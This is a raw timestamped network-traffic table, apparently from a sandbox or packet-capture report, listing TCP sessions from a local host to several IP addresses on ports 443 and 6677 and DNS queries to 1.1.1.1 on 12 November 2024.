                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.372287035 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.439254045 CET4434970523.206.229.209192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.439361095 CET49705443192.168.2.923.206.229.209
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.984241009 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.984344959 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.987761021 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.987773895 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.988275051 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:26.989866018 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.035326958 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.294908047 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295039892 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295088053 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295101881 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295253992 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295296907 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295305014 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295794964 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295842886 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295851946 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295892954 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295936108 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.295943022 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.339709044 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.339732885 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.386576891 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.412308931 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.412560940 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.412601948 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.412617922 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.412636042 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.412676096 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.412843943 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.413098097 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.413136959 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.413141012 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.413151026 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.413187027 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.455730915 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.511620998 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.511641026 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.529545069 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.529593945 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.529625893 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.529649019 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.529670000 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.529699087 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.530114889 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.530158997 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.530169964 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.530179977 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.530219078 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.530225039 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.573374033 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.573412895 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.573535919 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.573554993 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.573600054 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.573754072 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.620990992 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.646668911 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.646897078 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.646971941 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.646991014 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.699126005 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.699150085 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.745989084 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.764121056 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.764138937 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.764180899 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.764203072 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.764220953 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.764280081 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.764302015 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.764359951 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.764395952 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881275892 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881298065 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881320000 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881330013 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881350040 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881386042 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881386995 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881401062 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881417036 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881437063 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881443977 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998047113 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998061895 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998183966 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998228073 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998253107 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998279095 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998296976 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042352915 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042412996 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042485952 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042505980 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042535067 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.089735031 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159589052 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159605026 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159648895 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159687996 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159687996 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159706116 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159739017 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159764051 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233458996 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233484983 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233613968 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233632088 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233690023 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350327969 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350353956 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350474119 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350493908 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350537062 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.466960907 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.466986895 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.467061996 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.467082024 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.467125893 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511214972 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511241913 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511348963 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511365891 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511414051 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628045082 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628081083 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628195047 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628213882 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628278017 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701356888 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701381922 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701527119 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701548100 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701591969 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746151924 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746174097 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746272087 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746293068 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746332884 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858613014 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858647108 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858722925 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858741045 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858771086 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858791113 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.905936956 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906008005 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906024933 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906025887 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906049013 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906069040 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906717062 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:33.201752901 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:34.143117905 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:34.143505096 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:34.162354946 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:34.167248964 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:34.984215975 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.027251005 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.062135935 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.067640066 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.463476896 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.511909962 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.526124954 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.531064987 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.771852970 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.771871090 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.771924973 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772011995 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772022963 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772039890 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772057056 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772078991 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772104025 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772200108 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772217035 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772260904 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772835016 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772850037 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772865057 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.772881985 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.773245096 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.773289919 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.776989937 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.777020931 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.777095079 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891591072 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891604900 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891618967 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891633987 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891724110 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891731977 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891779900 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891783953 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891794920 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.891824007 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:35.933459997 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:36.808140039 CET6493253192.168.2.91.1.1.1
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:36.813106060 CET53649321.1.1.1192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:36.813211918 CET6493253192.168.2.91.1.1.1
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:36.839236975 CET6493253192.168.2.91.1.1.1
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:36.844254017 CET53649321.1.1.1192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:37.410428047 CET53649321.1.1.1192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:37.454128027 CET6493253192.168.2.91.1.1.1
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:37.459522963 CET53649321.1.1.1192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:37.459614992 CET6493253192.168.2.91.1.1.1
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.815217972 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820384979 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820415020 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820471048 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820491076 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820554018 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820565939 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820616007 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820698977 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820754051 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820761919 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820774078 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820842028 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820858002 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820869923 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820882082 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820929050 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.820945978 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.825562000 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.825612068 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.825629950 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.825686932 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.825838089 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.825881958 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826098919 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826112032 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826143026 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826144934 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826164961 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826186895 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826313019 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826395035 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826508045 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826572895 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826612949 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826806068 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826819897 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826848030 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826865911 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826893091 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.826909065 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.852054119 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.852247000 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.852327108 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857495070 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857542038 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857568979 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857605934 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857795954 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857840061 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857860088 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857892036 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857950926 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.857963085 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858007908 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858165026 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858258963 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858279943 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858293056 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858313084 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858340979 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858355999 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858376026 CET497096677192.168.2.94.251.123.83
